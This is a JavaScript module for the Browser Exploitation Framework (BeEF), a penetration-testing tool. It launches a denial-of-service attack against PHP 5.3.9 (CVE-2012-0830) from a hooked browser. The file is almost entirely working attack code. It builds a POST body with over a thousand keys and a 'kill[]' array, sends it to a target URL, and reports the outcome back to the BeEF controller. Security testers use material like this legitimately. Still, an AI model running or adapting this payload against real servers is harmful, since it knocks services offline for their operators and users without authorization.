//
// Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
// PoC written by Paul Westin
// PoC ported to BeEF by bcoles
// Bug discovered by Stefan Esser (@i0n1c)
// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/

// Generate 1000 normal keys and one array
function createEvilObj () {
    var evil_obj = {};
    for (var i = 0; i < 1001; i++) {
        evil_obj[i] = 1;
    }
    evil_obj['kill[]'] = 'kill';
    return evil_obj;
}

// Serialize Javascript object into POST data
function serializeObj (obj) {
    var str = [];
    for(var p in obj) {
        str.push(p + "=" + obj[p]);
    }
    return str.join("&");
}

// Run attack
function php_dos (target_url) {
    var bad = serializeObj(createEvilObj());
    var xhr = new XMLHttpRequest();
    xhr.open("POST", target_url, true);
    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
    xhr.setRequestHeader('Content-Length', bad.length);
    xhr.send(bad);
}

try {
    php_dos("<%= @url %>");
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
} catch (e) {
    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
}

});

